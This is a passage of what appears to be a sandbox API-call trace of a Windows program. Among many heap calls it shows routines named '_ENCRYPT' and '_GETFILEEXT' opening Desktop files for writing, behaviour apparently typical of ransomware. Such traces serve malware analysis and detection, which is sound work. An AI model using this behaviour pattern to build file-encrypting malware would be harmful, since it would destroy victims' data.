RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0029.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0029.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.935] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.936] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0029.936] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.937] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.938] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0029.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ccb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.938] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0029.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.938] CloseHandle (hObject=0x140) returned 1 [0029.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.939] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.939] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.940] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.940] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.940] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0029.940] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0029.941] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.941] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.941] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.941] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.941] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.941] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.941] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.941] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.941] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.941] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.941] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.941] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hnsu4w.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.941] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.941] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.941] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.941] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.941] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.942] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.942] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.942] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.942] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.942] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.942] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, 